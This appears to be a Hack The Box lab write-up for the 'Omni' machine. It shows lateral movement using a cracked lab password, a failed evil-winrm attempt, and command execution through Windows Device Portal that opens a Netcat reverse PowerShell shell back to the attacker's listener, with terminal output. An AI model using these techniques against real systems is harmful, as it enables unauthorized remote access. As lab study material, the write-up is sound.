InfoSec LAB

Omni_Lateral_Movement

Created: 3 min read

app

After dumping and cracking the password hash for the app user, I can use the existing WinRM service on the target port 5985 to start a PS session.

Fail with evil-winrm

┌──(kali㉿kali)-[~/archive/htb/labs/omni]
└─$ evil-winrm -i $IP -u 'app' -p 'mesh5143'
 
Evil-WinRM shell v3.4
 
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
 
Error: An error of type WinRM::WinRMHTTPTransportError happened, message is Unable to parse authorization header. Headers: {"Server"=>"Microsoft-HTTPAPI/2.0", "Date"=>"Sat, 04 Feb 2023 02:13:02 GMT", "Connection"=>"close", "Content-Length"=>"0"}
Body:  (404).
 
Error: Exiting with code 1

But evil-winrm fails to connect to the target system.

This is much likely due to the WinRM service not being configured correctly with the Windows IoT environment

So I decided to look for solution else where

WDP

I tried authenticating to the web server that was enumerated to be empty initially

I logged in! and It was WDP. it makes a complete sense that the web server is running a wdp over HTTP considering that the environment is Windows IoT

Windows Device Portal is a web-based interface for Windows Internet of Things (IoT) that provides access to device management and data, allowing developers to remotely manage, diagnose and debug their IoT devices.

RCE

Executing a command remotely is available through Processes > Run command I will just use the Netcat again. I initially placed it in the system root.

I used [System.Security.Principal.WindowsIdentity]::GetCurrent().Name since whoami.exe is not available

Executing the command

┌──(kali㉿kali)-[~/archive/htb/labs/omni]
└─$ nnc 8888           
listening on [any] 8888 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.204] 49706
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
PS C:\windows\system32> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
OMNI\app
PS C:\windows\system32> hostname
omni
PS C:\windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::a8
   IPv6 Address. . . . . . . . . . . : dead:beef::f178:17b1:199:4ce4
   Temporary IPv6 Address. . . . . . : dead:beef::f443:5df:b248:953c
   Link-local IPv6 Address . . . . . : fe80::f178:17b1:199:4ce4%4
   IPv4 Address. . . . . . . . . . . : 10.10.10.204
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%4
                                       10.10.10.2

Lateral Movement made to the app user

Interactive Graph View

Backlinks